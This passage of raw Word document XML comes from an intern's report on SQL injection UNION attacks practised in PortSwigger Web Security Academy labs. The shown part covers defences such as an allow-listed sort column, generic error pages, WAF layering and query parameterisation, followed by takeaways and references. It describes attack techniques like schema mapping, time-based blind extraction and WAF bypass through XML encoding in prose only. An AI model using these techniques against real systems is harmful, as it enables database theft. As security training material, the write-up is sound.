        <w:t xml:space="preserve">String sortColumn = allowedColumns.contains(userInputSort) ? userInputSort : </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"date_added"</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">String query = </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"SELECT * FROM products ORDER BY "</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + sortColumn;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Disabling Verbose Error Messages:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Production web applications should never expose detailed database engine errors, stack traces, or schema fragments in HTTP responses. Generic error pages (e.g., standard HTTP 500 pages) prevent attackers from gathering reconnaissance data through error-based vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Architectural WAF Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application Firewalls (WAFs) should be deployed as a secondary monitoring and virtual-patching layer rather than a primary defense. WAFs must be configured to inspect diverse payloads across all accepted encodings (including XML entities, JSON Unicode escapes, and multipart boundaries). </w:t>
      </w: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7F73B1" w:rsidRDefault="007F73B1" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="007F73B1" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. Strategic Conclusions &amp; Professional Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Completing the SQL Injection modules on PortSwigger Web Security Academy provided a thorough, practical understanding of database exploitation and defense. The key takeaways from these practical exercises include: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Input Hiding Offers Zero Security:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obscuring identifiers, relying on frontend validation, or hiding items on client interfaces does not protect the underlying database if queries remain vulnerable to injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metadata Enables Complete Reconstruction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attackers can systematically map and exfiltrate entire databases through standard metadata views (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all_tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), rendering randomized table or column names ineffective as a defense. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blind Execution Paths Remain Vulnerable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The lack of visual data reflection or error messages does not prevent exploitation. Time-based inference allows extracting data by monitoring network latency variations. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Perimeter Firewalls Are Bypassable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> WAFs that inspect raw traffic can be bypassed when backend parsers (such as XML entity processors) transform encoded input before executing the query, emphasizing that security must be implemented directly in the code. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Parameterization Is the Only Absolute Defense:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Securing modern web applications requires parameterizing all database queries across the entire codebase to maintain a strict separation between code execution and untrusted user input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This extensive practical foundation prepares for Task 4's remaining modules (including Cross-Site Scripting, Insecure Direct Object References, and Path Traversal) and provides the technical context needed for real-world web application penetration testing assessments. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="007F73B1" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8. Authoritative References &amp; Standards</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection Learning Path and Laboratories: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00817D5D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/sql-injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OWASP Top 10:2021:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A03:2021 — Injection Vulnerabilities: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00817D5D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://owasp.org/Top10/A03_2021-Injection/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OWASP Web Security Testing Guide (WSTG v4.2):</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing for SQL Injection (WSTG-INPV-05) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MITRE CVE Database &amp; CWE Framework:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IqraSec Academy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> WAPT Phase 1 Internship Instructions, Task Guidelines &amp; Deliverable Standards </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE01D8" w:rsidRPr="00FE01D8" w:rsidRDefault="00FE01D8" w:rsidP="00FE01D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FE01D8" w:rsidRPr="00FE01D8" w:rsidSect="00FE01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49B3" w:rsidRDefault="00F749B3" w:rsidP="002A515A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00F749B3" w:rsidRDefault="00F749B3"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817D5D" w:rsidRDefault="00817D5D">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:pBdr>
            <w:top w:val="single" w:sz="4" w:space="1" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          </w:pBdr>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="007F73B1">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
        <w:r>
          <w:t xml:space="preserve"> | </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
            <w:spacing w:val="60"/>
          </w:rPr>
          <w:t>Page</w:t>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00817D5D" w:rsidRPr="002A515A" w:rsidRDefault="007F73B1">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">SQL Injection: UNION Attacks </w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> | Kaustubh Ashish Bangar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49B3" w:rsidRDefault="00F749B3" w:rsidP="002A515A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00F749B3" w:rsidRDefault="00F749B3"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51E93"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F7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C19FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F92C9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470F78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="617C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C5741F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="13EC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15711D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="90E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4C1883"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="38C2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4F689F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC5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E64FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B709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2E5E73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BB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EB3057"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="882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D91452"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65F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774B26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77069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1C04AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C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1E5EF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F8685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112DAF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D9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8503B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="258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4F2C61"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C4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8E1765"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7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1B6937"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44C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603733"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC8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A21C01"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12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D4163D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9FD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087811"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0BF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44709A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E5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F24C5A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C51E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CFC59D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E07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1836A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD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773D68"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB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A17B64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD6A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F32E60"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="886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794935"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="666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9F74B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27E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F6A68BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8476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480A87"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D6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071D36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC36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6947F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C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26D15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B28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15F4462"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="695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3E0408"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C452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8F26947"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AB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A95AD0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="460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157A98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E400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ED95C34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="136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056944"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="425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F1144D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E10A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43"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="2"/>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066B8C"/>
    <w:rsid w:val="002A515A"/>
    <w:rsid w:val="00490796"/>
    <w:rsid w:val="007F73B1"/>
    <w:rsid w:val="00817D5D"/>
    <w:rsid w:val="009838FE"/>
    <w:rsid w:val="00C14DDB"/>
    <w:rsid w:val="00F749B3"/>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2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00817D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paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00817D5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7D5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817D5D"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FE01D8"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
